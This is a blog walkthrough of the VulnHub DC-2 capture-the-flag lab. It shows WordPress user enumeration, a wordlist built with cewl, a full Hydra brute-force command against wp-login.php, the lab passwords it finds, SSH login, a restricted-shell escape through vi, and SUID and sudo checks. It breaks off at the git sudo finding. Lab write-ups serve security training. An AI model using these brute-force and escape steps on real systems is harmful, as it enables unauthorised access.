VulnHub – DC-2 – Dan Rigby PenTesting

VulnHub – DC-2

Software Used:
Linux kali 4.19.0-kali1-amd64 #1 SMP Debian 4.19.13-1kali1 (2019-01-03) x86_64 GNU/Linux
NMap 7.70
FireFox 60.4 Oesr (64 bit)
DIRB V2.22
WPScan 3.4.3
Cewl 5.4.3
Hydra v8.8

I started with a ping sweep to determine DC-2’s IP Address using nmap –sn 10.0.2.*

After this I changed my host file (etc/hosts) to show 10.0.2.25 as dc-2. This will allow the web application to display correctly and stop any annoyances with redirects.

A full port scan using nmap –A 10.0.2.25 -p- reveals a http server and ssh running on an unusal port, 7744.

Navigating to the webpage http://dc-2 reveals the first of 5 flags, along with a hint.

There is a few things to do at this point:

Find where to log in
Find who to log in as
Find their password

The first point is easily addressed by using dirb http://dc-2

Navigating to /wp-admin redirects to a login page, now to find a username.

For this section I used wpscan –url http://dc-2 –e
wpscan is an automated WordPress scanning tool, just provide a URL and it will scan it, the –e option that I used is to enumerate the website for anything that could be useful.

WPScan has identified 10 vulnerabilities! Unfortunately none of these seem to be the intended route to the next flag. Sadly, even after trying a few of them I couldn’t achieve a shell.

It has, however, found a couple of usernames, Admin, Tom and Jerry

The next step is cracking their passwords, there was a hint on the first flag regarding cewl

Cewl is an automated tool to generate unique wordlists from websites.
I used cewl –w Desktop/dc2.txt http://dc-2
This command will write the file that I provided after –w containing all of the unique words from the URL provided.

With my completed wordlist I used Hydra to brute force a login, to do this I had to collect a bit of information about how the login form is structured first. On the login page I used FireFox’s Inspect Element tool and navigated to the network tab, this will show all of the requests sent and received by the page.

After attempting to login as Tom with a random password I had most of the information I needed.

First of all, I can see that we are using a POST form to wp-login.php
Scrolling down will reveal the parameters that I am posting to the server.

The highlighted section in the request body will be very important in building my Hydra command. All that is needed at this point is an error message or some information that will tell me that the login has been unsuccessful or successful (I tried the error message on the page but this didn’t work, I presume because it’s not in HTML header).
I used curl http://10.0.2.25/wp-login.php to analyse the HTML header.

Scrolling further down the header I found a lostpassword field, it wouldn’t make any sense to have this field available once logged in, so I successfully built a command using this.

The command I built was
hydra –L Desktop/dc2users.txt –P Desktop/dc2.txt 10.0.2.25 http-post-form “/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2Fdc-2%2Fwp-admin%2F&testcookie=1:F=Lost your password?” –vV –w 4 –t 4

Breaking this down:
hydra – The program that I am running.
-L Desktop/dc2users.txt – This is the login wordlist that I created containing just Tom & Jerry that Hydra will use in the place of ^USER^
–P Desktop/dc2.txt – This is the password list I created earlier using cewl, hydra will use the entries in this in place of ^PASS^
10.0.2.25 – The IP Address of dc-2.
http-post-form – The service/form that I am trying to crack.
“/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2Fdc-2%2Fwp-admin%2F&testcookie=1:F=Lost your password?” – This is broken into 3 sections, separated by “:” They are – “The http post form that I am attacking: The fields in the form: What to look for in the case of a failed attempt”
–vV –w 4 –t 4 – very verbose, wait for 4 seconds between attempts, try 4 users/passwords per attempt.

The password for Jerry was successfully found as adipiscing, Tom’s wasn’t found but I did notice that there was a redirect part way through the process for Tom.

This led me to believe that the password was found but Hydra didn’t register it, I tweaked the command slightly to attempt just Tom’s password.

I changed the –L parameter to –l tom, this will tell hydra to only attempt against the username tom. I also changed the concurrent threads to 2 (–t 2) to lessen the odds of a false positive/negative. Finally I added –f, this tells hydra to stop when a successful match is found.

This was successful and found the password parturient

I logged in as Tom but found nothing interesting, after logging in as Jerry I found the 2^nd flag.

Before this I was thinking that I might upload a reverse shell of some sort, but after reading the flag I remembered the unusual SSH port number.

Logging in as Jerry using the password I found was unsuccessful.

But logging in as Tom using ssh tom@10.0.2.25 –p 7744 was successful!

The id command doesn’t work, I’ve dealt with something similar before on UD64, I am using a restricted shell, so I need to find a way to escape it, right after reading flag3.

Really…? To find out what commands I can use I use compgen –A function –c, after looking through this quite extensive list, just like in UD64, vi is available to me, however this time a slightly different approach was needed.

I used vi flag3.txt to read the flag first of all and whilst I was there I used the command :set shell=/bin/bash followed by :shell

After this I changed $PATH to allow me to use more commands on the machine using export PATH=/bin:/usr/bin:$PATH

I confirm this has worked by using the cat command that was previously unavailable.

The hint in the flag mentions su, a command to switch users, before I tried this I checked if there are any SUID bits set and what sudo privileges Tom has, using the commands find / -perm –u=s –type f 2>/dev/null and sudo –l respectively, however there is nothing of interest here.

Using su jerry with the password I cracked earlier to switch to Jerry’s account is successful.

I switched to Jerrys home directory using cd $HOME, followed by ls –la, this revealed flag4.txt, after reading this I tried sudo –l to see what commands could be run as sudo on Jerry’s account, where git was revealed.